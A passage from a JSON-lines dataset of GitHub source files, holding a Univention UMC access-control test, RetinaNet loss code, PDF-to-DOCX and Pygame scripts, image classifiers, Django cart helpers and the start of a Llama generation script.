check_for_drs_replication=False, wait_for=False)\n hostname = ucr.get('hostname')\n\n operation_sets = []\n\n for i in range(1, 11):\n operation_sets.append(udm.create_object(\n 'settings/umc_operationset',\n position=\"cn=operations,cn=UMC,cn=univention,%s\" % udm.LDAP_BASE,\n name='join%s' % i,\n description='Join%s' % i,\n operation=[\"join/*\", \"lib/server/*\"],\n wait_for_replication=False,\n ))\n policy_dn = udm.create_object(\n 'policies/umc',\n position=\"cn=UMC,cn=policies,%s\" % udm.LDAP_BASE,\n name='test-umc-policy',\n wait_for_replication=False,\n )\n udm.modify_object('users/user', dn=test_user, policy_reference=policy_dn, wait_for_replication=False)\n\n def _test_new_acl(operation_set_dn, new_values, should_work=True):\n udm.modify_object('settings/umc_operationset', dn=operation_set_dn, hosts=new_values, wait_for_replication=False)\n udm.modify_object('policies/umc', dn=policy_dn, allow=operation_set_dn, wait_for_replication=False)\n\n if should_work:\n data = Client(None, username, 'univention').umc_command('join/scripts/query').result\n assert isinstance(data, list), data\n else:\n with pytest.raises(Forbidden):\n Client(None, username, 'univention').umc_command('join/scripts/query').result # noqa: B018\n\n _test_new_acl(operation_sets[0], ['systemrole:domaincontroller_master', 'systemrole:domaincontroller_backup'])\n _test_new_acl(operation_sets[1], ['systemrole:domaincontroller_master'])\n _test_new_acl(operation_sets[2], ['systemrole:domaincontroller_backup'], False)\n _test_new_acl(operation_sets[3], ['foo', '%s' % hostname])\n _test_new_acl(operation_sets[4], ['*'])\n _test_new_acl(operation_sets[5], ['foo'], False)\n _test_new_acl(operation_sets[6], ['service:LDAP'])\n _test_new_acl(operation_sets[7], ['service:LDAP', 'service:FOO'])\n _test_new_acl(operation_sets[8], ['service:BAR'], False)\n _test_new_acl(operation_sets[9], ['*%s' % hostname[2:]])\n","repo_name":"univention/univention-corporate-server","sub_path":"test/ucs-test/tests/60_umc/03_acls.py","file_name":"03_acls.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"11274369133","text":"import torch.nn as nn\nimport torch\nfrom model.retina_config import DefaultConfig\nimport numpy as np\n\ndef coords_fmap2orig(image_shape,stride):\n '''\n transfor one fmap coords to orig coords\n Args\n featurn [batch_size,h,w,c]\n stride int\n Returns\n coords [n,2]\n '''\n h,w= image_shape\n shifts_x = torch.arange(0, w * stride, stride, dtype=torch.float32)\n shifts_y = torch.arange(0, h * stride, stride, dtype=torch.float32)\n\n shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)\n shift_x = torch.reshape(shift_x, [-1])\n shift_y = torch.reshape(shift_y, [-1])\n coords = torch.stack([shift_x, shift_y, shift_x, shift_y], -1) + stride // 2\n return coords\n\nclass GenAnchors(nn.Module):\n def __init__(self, config = None):\n super().__init__()\n if config is None:\n self.config = DefaultConfig\n else:\n self.config = config\n\n self.pyramid_levels = self.config.pyramid_levels\n self.ratios = np.array(self.config.ratios)\n self.scales = np.array(self.config.scales)\n self.size = self.config.sizes\n self.strides = self.config.strides\n\n def forward(self, image):\n H, W = image.size(2), image.size(3) #(ori_H, ori_W)\n feature_size = [(H / stride, W / stride) for stride in self.strides]\n all_anchors = []\n for i in range(len(feature_size)):\n anchors = self.generate_anchors(self.size[i], self.ratios, self.scales)\n shift_anchors = self.shift(anchors, feature_size[i], self.strides[i]) #(H*W, A, 4)\n all_anchors.append(shift_anchors)\n all_anchors = torch.cat(all_anchors, dim = 0)\n return all_anchors\n\n def generate_anchors(self, base_size=16, ratios=None, scales=None):\n if ratios is None:\n ratios = np.array([0.5, 1, 2])\n if scales is None:\n scales = np.array([2 ** 0, 2 ** (1.0 / 3.0), 2 ** (2.0 / 3.0)])\n\n num_anchors = len(ratios) * len(scales) # 9\n anchors = np.zeros((num_anchors, 4))\n anchors[:, 2:] = base_size * np.tile(scales, (2, len(ratios))).T\n # compute areas of anchors\n areas = anchors[:, 2] * anchors[:, 3] # (9,)\n # fix the ratios of w, h\n anchors[:, 2] = np.sqrt(areas / np.repeat(ratios, len(scales))) # (9,)\n anchors[:, 3] = anchors[:, 2] * np.repeat(ratios, len(scales)) # (9,)\n\n # transfrom from(0 ,0, w, h ) to ( x1, y1, x2, y2)\n anchors[:, 0::2] -= np.tile(anchors[:, 2] * 0.5, (2, 1)).T\n anchors[:, 1::2] -= np.tile(anchors[:, 3] * 0.5, (2, 1)).T\n anchors = torch.from_numpy(anchors).float().cuda() if torch.cuda.is_available() else torch.from_numpy(anchors).float()\n return anchors\n\n def shift(self, anchors, image_shape, stride):\n \"\"\"\n anchors : Tensor(num, 4)\n image_shape : (H, W)\n return shift_anchor: (H*W*num,4)\n \"\"\"\n\n ori_coords = coords_fmap2orig(image_shape, stride) # (H*W, 4) 4:(x,y,x,y)\n ori_coords = ori_coords.to(device=anchors.device)\n shift_anchor = ori_coords[:, None, :] + anchors[None, :, :]\n return shift_anchor.reshape(-1, 4)\n\n\ndef calc_iou(box1, box2):\n \"\"\"\n box1:(M,4)\n box2:(N,4)\n \"\"\"\n lt = torch.max(box1[:,None,:2], box2[:, :2]) #(M,N,2)\n rb = torch.min(box1[:,None,2:], box2[:, 2:]) #(M,N,2)\n wh = torch.clamp(rb - lt , min=0.0) #(M, N, 2)\n inter_area = wh[..., 0] * wh[..., 1] #(M, N)\n area_box1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1]) #(M,)\n area_box2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1]) #(N,)\n\n iou = inter_area / (area_box1[:,None] + area_box2 - inter_area + 1e-16) #(M,N)\n\n return iou\ndef focal_loss(preds, targets, alpha=0.25, gamma = 2.0):\n preds = preds.sigmoid()\n preds = torch.clamp(preds, min=1e-4,max = 1. - 1e-4)\n if torch.cuda.is_available():\n alpha_factor = torch.ones(targets.shape).cuda() * alpha\n else:\n alpha_factor = torch.ones(targets.shape) * alpha\n\n alpha_factor = torch.where(torch.eq(targets, 1.), alpha_factor, (1. - alpha_factor))\n focal_weights = torch.where(torch.eq(targets, 1.), 1 - preds, preds)\n focal_weights = alpha_factor * torch.pow(focal_weights, gamma)\n\n bce = - (targets * torch.log(preds) + (1. - targets) * torch.log(1. - preds))\n cls_loss = focal_weights * bce\n\n if torch.cuda.is_available():\n cls_loss = torch.where(torch.ne(targets, -1.0), cls_loss, torch.zeros_like(cls_loss).cuda())\n else:\n cls_loss = torch.where(torch.ne(targets, -1.0), cls_loss, torch.zeros_like(cls_loss))\n\n return cls_loss.sum()\n\n\ndef smooth_l1(pos_inds,anchor_infos, boxes,reg_pred):\n \"\"\"\n pos_inds : (num_pos,)\n boxes:(sum(H*W)*A, 4)\n reg_pred: (sum(H*W)*A, 4)\n \"\"\"\n anchor_widths, anchor_heights, anchor_ctr_x, anchor_ctr_y = anchor_infos #(sum(H*W)*A,)\n if pos_inds.sum() > 0:\n\n pos_reg_pred = reg_pred[pos_inds,:] #(num_pos, 4)\n\n gt_widths = boxes[pos_inds][:, 2] - boxes[pos_inds][:, 0]\n gt_heights = boxes[pos_inds][:, 3] - boxes[pos_inds][:, 1]\n gt_ctr_x = boxes[pos_inds][:, 0] + gt_widths * 0.5\n gt_ctr_y = boxes[pos_inds][:, 1] + gt_heights * 0.5\n\n pos_anchor_widths = anchor_widths[pos_inds]\n pos_anchor_heights = anchor_heights[pos_inds]\n pos_anchor_ctr_x = anchor_ctr_x[pos_inds]\n pos_anchor_ctr_y = anchor_ctr_y[pos_inds]\n\n gt_widths = torch.clamp(gt_widths, min=1.0)\n gt_heights = torch.clamp(gt_heights, min=1.0)\n\n target_dx = (gt_ctr_x - pos_anchor_ctr_x) / pos_anchor_widths\n target_dy = (gt_ctr_y - pos_anchor_ctr_y) / pos_anchor_heights\n target_dw = torch.log(gt_widths / pos_anchor_widths)\n target_dh = torch.log(gt_heights / pos_anchor_heights)\n\n targets = torch.stack([target_dx,target_dy,target_dw,target_dh], dim=0).t() #(num_pos,4)\n if torch.cuda.is_available():\n targets = targets / torch.FloatTensor([0.1,0.1,0.2,0.2]).cuda()\n else:\n targets = targets / torch.FloatTensor([0.1,0.1,0.2,0.2])\n\n\n reg_diff = torch.abs(targets - pos_reg_pred) #(num_pos,4)\n reg_loss = torch.where(\n torch.le(reg_diff, 1.0/9.0),\n 0.5 * 9.0 * torch.pow(reg_diff, 2),\n reg_diff - 0.5 /9.0\n )\n return reg_loss.mean()\n else:\n if torch.cuda.is_available():\n reg_loss = torch.tensor(0).float().cuda()\n else:\n reg_loss = torch.tensor(0).float()\n\n return reg_loss\n\ndef giou(pos_inds,anchor_infos, boxes,reg_pred):\n \"\"\"\n pos_inds : (num_pos,)\n boxes:(sum(H*W)*A, 4)\n reg_pred: (sum(H*W)*A, 4)\n \"\"\"\n anchor_widths, anchor_heights, anchor_ctr_x, anchor_ctr_y = anchor_infos #(sum(H*W)*A,)\n if pos_inds.sum() > 0:\n\n pos_reg_pred = reg_pred[pos_inds,:] #(num_pos, 4)\n\n gt_boxes = boxes[pos_inds,:] #(num_pos, 4)\n\n pos_anchor_widths = anchor_widths[pos_inds] #(num_pos,)\n pos_anchor_heights = anchor_heights[pos_inds] #(num_pos,)\n pos_anchor_ctr_x = anchor_ctr_x[pos_inds] #(num_pos,)\n pos_anchor_ctr_y = anchor_ctr_y[pos_inds] #(num_pos,)\n\n\n dx = pos_reg_pred[:, 0] * 0.1 #(num_pos,)\n dy = pos_reg_pred[:, 1] * 0.1 #(num_pos,)\n dw = pos_reg_pred[:, 2] * 0.2 #(num_pos,)\n dh = pos_reg_pred[:, 3] * 0.2 #(num_pos,)\n\n pred_ctr_x = dx * pos_anchor_widths + pos_anchor_ctr_x #(num_pos,)\n pred_ctr_y = dy * pos_anchor_heights + pos_anchor_ctr_y #(num_pos,)\n pred_w = torch.exp(dw) * pos_anchor_widths #(num_pos,)\n pred_h = torch.exp(dh) * pos_anchor_heights #(num_pos,)\n\n pred_x1 = pred_ctr_x - pred_w * 0.5 #(num_pos,)\n pred_y1 = pred_ctr_y - pred_h * 0.5 #(num_pos,)\n pred_x2 = pred_ctr_x + pred_w * 0.5 #(num_pos,)\n pred_y2 = pred_ctr_y + pred_h * 0.5 #(num_pos,)\n\n preds_boxes = torch.stack([pred_x1,pred_y1,pred_x2,pred_y2], dim=0).t() #(num_pos,4)\n reg_loss = compute_giou_loss(gt_boxes, preds_boxes)\n else:\n if torch.cuda.is_available():\n reg_loss = torch.tensor(0).float().cuda()\n else:\n reg_loss = torch.tensor(0).float()\n\n return reg_loss\n\ndef compute_giou_loss(boxes1, boxes2):\n \"\"\"\n boxes1 :(N,4) (x1,y1,x2,y2)\n boxes2: (N,4) (x1,y1,x2,y2)\n \"\"\"\n x1y1 = torch.max(boxes1[:, :2], boxes2[:, :2])\n x2y2 = torch.min(boxes1[:, 2:], boxes2[:, 2:])\n wh = torch.clamp(x2y2 - x1y1, min=0.)\n area_inter = wh[:, 0] * wh[:, 1]\n area_b1 = (boxes1[:, 2] - boxes1[:, 0]) * (boxes1[:, 3] - boxes1[:, 1])\n area_b2 = (boxes2[:, 2] - boxes2[:, 0]) * (boxes2[:, 3] - boxes2[:, 1])\n union = area_b1 + area_b2 - area_inter\n iou = area_inter / (union + 1e-16)\n\n x1y1_max = torch.min(boxes1[:, :2], boxes2[:, :2])\n x2y2_max = torch.max(boxes1[:, 2:], boxes2[:, 2:])\n g_wh = torch.clamp(x2y2_max - x1y1_max, min=0.)\n g_area = g_wh[:, 0] * g_wh[:, 1]\n\n giou = iou - (g_area - union) / g_area.clamp(1e-10)\n loss = 1. - giou\n return loss.mean()\n\nclass LOSS(nn.Module):\n def __init__(self,reg_mode = 'giou'):\n super(LOSS, self).__init__()\n self.reg_mode = reg_mode\n\n def forward(self, inputs):\n \"\"\"\n cls_logits :(n, sum(H*W)*A, class_num+1)\n reg_preds:(n, sum(H*W)*A, 4)\n anchors:(sum(H*W)*A, 4)\n boxes:(n, max_num, 4)\n classes:(n, max_num)\n \"\"\"\n cls_logits, reg_preds, anchors, boxes, classes = inputs\n anchor_widths = anchors[:, 2] - anchors[:, 0]\n anchor_heights = anchors[:, 3] - anchors[:, 1]\n anchor_ctr_x = anchors[:, 0] + anchor_widths * 0.5\n anchor_ctr_y = anchors[:, 1] + anchor_heights * 0.5\n\n bacth_size = cls_logits.shape[0]\n class_loss = []\n reg_loss = []\n for i in range(bacth_size):\n per_cls_logit = cls_logits[i,:,:] #(sum(H*W)*A, class_num)\n per_reg_pred = reg_preds[i,:,:]\n per_boxes = boxes[i,:,:]\n per_classes = classes[i,:]\n mask = per_boxes[:, 0] != -1\n per_boxes = per_boxes[mask] #(?, 4)\n per_classes = per_classes[mask] #(?,)\n if per_classes.shape[0] == 0:\n alpha_factor = torch.ones(per_cls_logit.shape).cuda() * 0.25 if torch.cuda.is_available() else torch.ones(per_cls_logit.shape) * 0.25\n alpha_factor = 1. - alpha_factor\n focal_weights = per_cls_logit\n focal_weights = alpha_factor * torch.pow(focal_weights, 2.0)\n bce = -(torch.log(1.0 - per_cls_logit))\n cls_loss = focal_weights * bce\n class_loss.append(cls_loss.sum())\n reg_loss.append(torch.tensor(0).float())\n continue\n IoU = calc_iou(anchors, per_boxes) #(sum(H*W)*A, ?)\n\n iou_max, max_ind = torch.max(IoU, dim=1) #(sum(H*W)*A,)\n \n \n targets = torch.ones_like(per_cls_logit) * -1 #(sum(H*W)*A, class_num)\n \n \n targets[iou_max < 0.4, :] = 0 #bg\n\n pos_anchors_ind = iou_max >= 0.5 #(?,)\n num_pos = torch.clamp(pos_anchors_ind.sum().float(), min=1.0)\n\n assigned_classes = per_classes[max_ind] #(sum(H*W)*A, )\n assigned_boxes = per_boxes[max_ind,:] #(sum(H*W)*A, 4)\n\n targets[pos_anchors_ind,:] = 0\n targets[pos_anchors_ind, (assigned_classes[pos_anchors_ind]).long() - 1] = 1\n\n class_loss.append(focal_loss(per_cls_logit, targets).view(1) / num_pos)\n if self.reg_mode == 'smoothl1':\n reg_loss.append(smooth_l1(pos_anchors_ind, [anchor_widths,anchor_heights,anchor_ctr_x,anchor_ctr_y],\n assigned_boxes,per_reg_pred))\n elif self.reg_mode =='giou':\n reg_loss.append(giou(pos_anchors_ind, [anchor_widths, anchor_heights, anchor_ctr_x, anchor_ctr_y],\n assigned_boxes, per_reg_pred))\n\n cls_loss = torch.stack(class_loss).mean()\n reg_loss = torch.stack(reg_loss).mean()\n total_loss = cls_loss + reg_loss\n return cls_loss, reg_loss, total_loss\n\n\nif __name__ ==\"__main__\":\n \"\"\"\n cls_logits :(n, sum(H*W)*A, class_num+1)\n reg_preds:(n, sum(H*W)*A, 4)\n anchors:(sum(H*W)*A, 4)\n boxes:(n, max_num, 4)\n classes:(n, max_num)\n \"\"\"\n image = torch.rand((1,3,512,384))\n anchor_model = GenAnchors()\n anchors = anchor_model(image)\n boxes = [[69,172,270,330],[150,141,229,284],[258,198,297,329]]\n classes = [12,1,1]\n boxes = torch.FloatTensor(boxes) #(3,4)\n boxes = torch.nn.functional.pad(boxes,[0, 0, 0, 47],value=-1).unsqueeze(dim=0)\n classes = torch.FloatTensor(classes) #(3,)\n classes = torch.nn.functional.pad(classes,[0,47],value=-1).unsqueeze(dim=0)\n annotation = torch.cat([boxes,classes.unsqueeze(dim=2)], dim=2)\n #print(annotation)\n # print(anchors.dtype)\n # print(boxes.dtype)\n cls_logits = torch.ones((1,36828,20)) * 0.5\n reg_preds = torch.ones((1,36828,4))\n loss = LOSS()\n print(loss([cls_logits,reg_preds,anchors,boxes,classes]))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zhenghao977/RetinaNet-Pytorch-36.4AP","sub_path":"model/retina_loss.py","file_name":"retina_loss.py","file_ext":"py","file_size_in_byte":13196,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"33"} +{"seq_id":"71200208734","text":"def get_lots_stats(queryset):\n '''Extract stats from a given lots' 'queryset' '''\n stats ={'total_poids_Ta':0,\n 'total_poids_Sn':0,\n 'total_poids_W':0,\n 'total_colis_Ta':0,\n 'total_colis_Sn':0,\n 'total_colis_W':0}\n for obj in queryset:\n if obj.minerai.symbol == 'Ta':\n stats['total_poids_Ta'] += obj.poids\n stats['total_colis_Ta'] += obj.colis\n elif obj.minerai.symbol == 'Sn':\n stats['total_poids_Sn'] += obj.poids\n stats['total_colis_Sn'] += obj.colis\n elif obj.minerai.symbol == 'W':\n stats['total_poids_W'] += obj.poids\n stats['total_colis_W'] += obj.colis\n return stats","repo_name":"elieidrissa/cfm-pro-api","sub_path":"cfm_pro_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16493681896","text":"import PyPDF2\nimport docx\nimport argparse\nimport os\n\nPDFfilename = 'C:/Users/Shahnawaz/Downloads/MCA_First_Year.pdf'\nOutputLocation = 'docs.docx'\n\na=[]\n\n#parser = argparse.ArgumentParser(description='Extract Text from Pdf into Docx...')\n#parser.add_argument('pdfFileName', type=str,help='Pdf File Name or Path to the pdf file..')\n#parser.add_argument(\"-o\",'--OutputLocation', type=str,help='Output path to store converted Pdf as .docx extension ..',default=\"C:/Users/Administrator/Desktop/default.docx\")\n#args=parser.parse_args()\n#PDFfilename = args.pdfFileName #filename of your PDF/directory where your PDF is stored\n\npdfFileObj=open(PDFfilename,'rb')\npdfReader=PyPDF2.PdfFileReader(pdfFileObj)\nfor i in range(0,pdfReader.numPages):\n pageobj=pdfReader.getPage(i)\n a.append(pageobj.extractText())\npdfFileObj.close()\ndoc = docx.Document()\n\nfor i in range(len(a)):\n doc.add_paragraph(a[i])\n doc.add_page_break()\ndoc.save(OutputLocation)\n","repo_name":"yasharkawasthi/python_projects","sub_path":"files_converter/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"5685654546","text":"import concurrent.futures\nimport functools\nimport typing\n\nimport numpy\nimport PIL.Image\nimport torch\n\nimport models\nimport transforms\n\n\nclass Classifier:\n def __init__(\n self,\n model_name: str = None,\n classes: typing.List[str] = None,\n transform_name: str = None,\n output_to_idx: typing.Callable[[torch.Tensor], torch.Tensor] = None,\n pretained: bool = True,\n **kwargs,\n ) -> None:\n self.model_name = model_name\n self.classes = classes\n self.transform_name = transform_name\n self.output_to_idx = output_to_idx\n if model_name is not None:\n self.model: torch.nn.Module = models.get_model(model_name, len(classes), pretrained=pretained, **kwargs)\n if transform_name is not None:\n self.transform: typing.Callable[[typing.Union[PIL.Image.Image, numpy.ndarray]], torch.Tensor] = getattr(transforms, transform_name)\n\n def classify(self, image: numpy.ndarray) -> str:\n with torch.no_grad():\n input = self.transform(image) # [CHW]\n input = input.reshape(1, *input.shape) # [NCHW]\n self.model.eval()\n output: torch.Tensor = self.model(input)\n idx = self.output_to_idx(output)\n idx = idx.reshape(1)\n idx = idx.item()\n return self.classes[idx]\n\n def state_dict(self, **kwargs):\n d = {}\n d['model_name'] = self.model_name\n d['classes'] = self.classes\n d['transform_name'] = self.transform_name\n d['model_state_dict'] = self.model.state_dict(**kwargs)\n d['name'] = self.__class__.__name__\n return d\n\n def load_state_dict(self, state_dict: dict, strict: bool = True):\n model_name = state_dict['model_name']\n classes = state_dict['classes']\n transform_name = state_dict['transform_name']\n self.model_name = model_name\n self.classes = classes\n self.transform_name = transform_name\n if model_name is not None:\n self.model: torch.nn.Module = models.get_model(model_name, len(classes), pretrained=False)\n if transform_name is not None:\n self.transform: typing.Callable[[typing.Union[PIL.Image.Image, numpy.ndarray]], torch.Tensor] = getattr(transforms, transform_name)\n self.model.load_state_dict(state_dict['model_state_dict'], strict=strict)\n\n\nclass ClassifierArgmax(Classifier):\n def __init__(\n self,\n model_name: str = None,\n classes: typing.List[str] = None,\n transform_name: str = None,\n pretrained: bool = True,\n **kwargs,\n ) -> None:\n super().__init__(model_name, classes, transform_name, functools.partial(torch.argmax, dim=-1), pretrained, **kwargs)\n\n\nclass EnsembleClassifier:\n def __init__(self, classifiers: typing.List[Classifier], method=None, threshold=0, prelim: Classifier = None, training_data_dic=None) -> None:\n assert len(classifiers) > 0\n classes = classifiers[0].classes\n for classifier in classifiers:\n assert classifier.classes == classes\n assert method in (None, 'ThreadPoolExecutor')\n\n self.classifiers = classifiers\n self.classes = classes\n self.softmax = torch.nn.Softmax(dim=-1)\n self.output_to_idx = functools.partial(torch.max, dim=-1)\n self.method = method\n self.threshold = threshold\n self.prelim = prelim\n self.training_data_dic = [] if training_data_dic is None else training_data_dic\n\n def fn(self, classifier: Classifier, image: numpy.ndarray):\n input = classifier.transform(image) # [CHW]\n input = input.reshape(1, *input.shape) # [NCHW]\n classifier.model.eval()\n output: torch.Tensor = classifier.model(input)\n return self.softmax(output)\n\n def classify(self, image: numpy.ndarray) -> str:\n if self.prelim is not None:\n c = self.prelim.classify(image)\n if c != 'isnull' and c not in self.training_data_dic:\n print('prelim', c)\n return c\n with torch.no_grad():\n if self.method == 'ThreadPoolExecutor':\n prob = 0\n futures: typing.List[concurrent.futures.Future] = []\n with concurrent.futures.ThreadPoolExecutor(len(self.classifiers)) as executor:\n for classifier in self.classifiers:\n futures.append(executor.submit(self.fn, classifier, image))\n for future in futures:\n prob += future.result()\n prob = prob / len(self.classifiers)\n elif self.method is None:\n prob = 0\n for classifier in self.classifiers:\n prob += self.fn(classifier, image)\n prob = prob / len(self.classifiers)\n max_prob, idx = self.output_to_idx(prob)\n if max_prob < self.threshold:\n c = 'isnull'\n else:\n idx = idx.reshape(1)\n idx = idx.item()\n c = self.classes[idx]\n return c\n","repo_name":"BruceJian43/TBrain2021-Chinese-Character-Recognition","sub_path":"src/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24756759422","text":"#https://www10.lunapic.com/editor/ to edit backgrounds\nimport pygame\nimport random\n\n\npygame.init()\n\nblack = (0,0,0)\nwhite = (255,255,255)\n\nbackground = pygame.image.load(\"Visual Studio Code/Python/Pokemon_battle/Images/background.jpg\")\nbackground = pygame.transform.scale(background, (873*0.5,479*0.5))\nsquirtle = pygame.image.load(\"Visual Studio Code/Python/Pokemon_battle/Images/squirtle.png\")\nsquirtle = pygame.transform.scale(squirtle, (50, 80))\nsquirtle = pygame.transform.flip(squirtle, 180, 0) \ncharmender = pygame.image.load(\"Visual Studio Code/Python/Pokemon_battle/Images/charmender.png\")\ncharmender = pygame.transform.scale(charmender, (50, 80))\nmyfont = pygame.font.SysFont(\"Comic Sans MS\", 20)\ntitle = myfont.render(\"WELCOME TO POKEMON ROYALE\", 1, black)\n\n\n\nSCREEN = pygame.display.set_mode((873*0.5,479*0.5))\nFPS = 50\n\ndef update():\n pygame.display.update()\n pygame.time.Clock().tick(FPS)\n\ndef draw_objects():\n SCREEN.blit(background,(0,0))\n SCREEN.blit(squirtle,(squirtle_x, squirtle_y))\n SCREEN.blit(charmender, (charmender_x, charmender_y))\n SCREEN.blit(title, (title_x,title_y))\n\n\ndef start():\n global squirtle_x, squirtle_y, squirtle_vel, charmender_x, charmender_y, title_x, title_y\n squirtle_x, squirtle_y = 200*0.5,240*0.5\n charmender_x, charmender_y = 600*0.5, 240*0.5\n squirtle_vel = 0\n title_x, title_y = 50, 20\n\nstart()\n\nrunning = True\n\nwhile running:\n draw_objects()\n update()\n\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False","repo_name":"lucavillani/Pokemon_battle","sub_path":"Pokemon Royale - Graphics.py","file_name":"Pokemon Royale - Graphics.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"39109302762","text":"from .models import Cart, CartDetails, Wishlist, CustomAccount\nfrom django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist\nfrom products.models import Product\nfrom django.contrib import messages\nimport json\n\n\ndef get_cart(session):\n cart = session.get(\"user-cart\")\n if cart == None:\n cart = json.dumps({})\n session[\"user-cart\"] = cart\n return json.loads(cart)\n\ndef parse_message(request, message, message_type):\n if message_type == \"info\":\n messages.info(request, message=message)\n elif message_type == \"success\":\n messages.success(request, message=message)\n elif message_type == \"warning\":\n messages.warning(request, message=message)\n elif message_type == \"error\":\n messages.error(request, message=message)\n\ndef add_to_wishlist(user, product):\n # product_id = request.POST[\"product_id\"]\n # product = Product.objects.get(id=product_id)\n if user.is_authenticated:\n user_wishlist = Wishlist.objects.get_or_create(user=user)[0]\n try:\n the_p = user_wishlist.wish_products.get(id=product.id)\n except MultipleObjectsReturned:\n all_duplicated = user_wishlist.wish_products.filter(id=product.id)[1:]\n for item in all_duplicated:\n user_wishlist.wish_products.remove(item)\n message = \"Multiple items found in your Wishlist. Deleting Now.\"\n message_type = \"info\"\n except ObjectDoesNotExist:\n user_wishlist.wish_products.add(product)\n user_wishlist.save()\n message = \"Item added to Wishlist\"\n message_type = \"success\"\n else:\n message = \"This item already exists in your wishlist\"\n message_type = \"info\"\n else:\n message = \"You need to be logged in to add items to your wishlist\"\n message_type = \"warning\"\n\n return message, message_type\n # return JsonResponse({\"message\": message, \"type\": message_type}, status=200)\n\ndef add_to_cart(request, product, quantity):\n quantity = int(quantity)\n # product_exists = Cart.cart_products.get(product)\n user = request.user\n product_id = product.id\n if user.is_authenticated:\n user_cart = Cart.objects.get(user=user)\n user_wishlist = Wishlist.objects.get_or_create(user=user)[0]\n try:\n the_p = user_cart.cart_products.get(id=product.id)\n except MultipleObjectsReturned:\n all_duplicated = user_cart.cart_products.filter(id=product.id)[1:]\n for item in all_duplicated:\n user_cart.cart_products.remove(item)\n message = \"Multiple items found in your cart. Deleting Now.\"\n message_type = \"info\"\n except ObjectDoesNotExist:\n detailed_cart = CartDetails.objects.create(\n cart = user_cart,\n product = product,\n quantity = quantity,\n )\n detailed_cart.save()\n message = \"Item added to cart\"\n message_type = \"success\"\n else:\n complete_cart = CartDetails.objects.get(cart=user_cart, product=product)\n complete_cart.quantity += quantity\n complete_cart.save()\n quantity = complete_cart.quantity\n message = \"Cart Updated Successfully\"\n message_type = \"success\"\n user_wishlist.wish_products.remove(product)\n return message, message_type\n else:\n user_cart = get_cart(request.session)\n \n if str(product_id) in user_cart:\n item = user_cart[str(product_id)]\n item_quantity = int(item[\"quantity\"])\n item[\"quantity\"] = str(item_quantity + quantity)\n message = \"Cart Item Updated\"\n quantity = item[\"quantity\"]\n else:\n user_cart[int(product_id)] = {\"quantity\": quantity}\n message = \"Item Added To Cart\"\n request.session['user-cart'] = json.dumps(user_cart)\n message_type = \"success\"\n \n return message, message_type\n\n return message, message_type\n\ndef remove_from_wishlist(user, product):\n if user.is_authenticated:\n try:\n user_wishlist = Wishlist.objects.get(user=user)\n except ObjectDoesNotExist:\n message_type = \"error\"\n message = \"You do not have a wishlist\"\n else:\n user_wishlist.wish_products.remove(product)\n message_type = \"success\"\n message = \"Product removed from wishlist\"\n else:\n message = \"You do not have an account with us\"\n message_type = \"error\"\n\n return message, message_type\n\ndef remove_from_cart(request, product):\n user = request.user\n product_id = str(product.id)\n if user.is_authenticated:\n your_cart = Cart.objects.get(user=user)\n try:\n cart_details = CartDetails.objects.get(cart=your_cart, product=product)\n except ObjectDoesNotExist:\n message = \"This product is not in your cart\"\n message_type= \"error\"\n else:\n cart_details.delete()\n message_type = \"success\"\n message = \"Product removed from cart\"\n else:\n user_cart = get_cart(request.session)\n\n if product_id in user_cart:\n user_cart.pop(product_id)\n message = \"Product removed from cart\"\n message_type = \"success\"\n else:\n message_type = \"error\"\n message = \"This product is not in your cart\"\n\n request.session['user-cart'] = json.dumps(user_cart)\n\n return message, message_type\n\ndef clear_wishlist(user):\n if user.is_authenticated:\n user_wish = Wishlist.objects.get(user=user)\n if user_wish.get_item_count() > 0:\n user_wish.wish_products.clear()\n message = \"All products in your wishlist have been removed\"\n message_type = \"success\"\n else:\n message = \"There are no products in your wishlist\"\n message_type = \"info\"\n else:\n message = \"You are not logged in\"\n message_type = \"warning\"\n\n return message, message_type\n\ndef clear_cart(request):\n user = request.user\n if user.is_authenticated:\n user_cart = Cart.objects.get(user=user)\n if user_cart.get_item_count() > 0:\n user_cart.cart_products.clear()\n message = \"Cart cleared successfully\"\n message_type = \"success\"\n else:\n message = \"There are no items in your cart\"\n message_type = \"info\"\n else:\n user_cart = get_cart(request.session)\n cartlist = list(user_cart.keys())\n\n if len(cartlist) > 0:\n request.session['user-cart'] = json.dumps({})\n message = \"Cart cleared successfully\"\n message_type = \"success\"\n else:\n message = \"There are no items in your cart\"\n message_type = \"info\"\n\n return message, message_type","repo_name":"CodeKing12/shoppa","sub_path":"accounts/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31725513599","text":"from transformers import AutoTokenizer\nimport transformers\nimport torch\n\nmodel = \"NoahBSchwartz/llama-2-7b-LLM-Link8\"\n\ntokenizer = AutoTokenizer.from_pretrained(model)\npipeline = transformers.pipeline(\n \"text-generation\",\n model=model,\n torch_dtype=torch.float16,\n device_map=\"auto\",\n)\n\nprompt = \"\"\"What was the aim of the Gravity Probe B (GP-B) mission?\"\"\"\nsequences = pipeline(\n f\"[INST] {prompt} [/INST] What\",\n do_sample=True, # (True/False) - False leads to greedy decoding, True enables stochastic sampling\n top_k=10, # (0 to vocab size) - A lower value (e.g., 0) means no restriction, higher value narrows down the sampling pool\n top_p=0.9, # (0.0 to 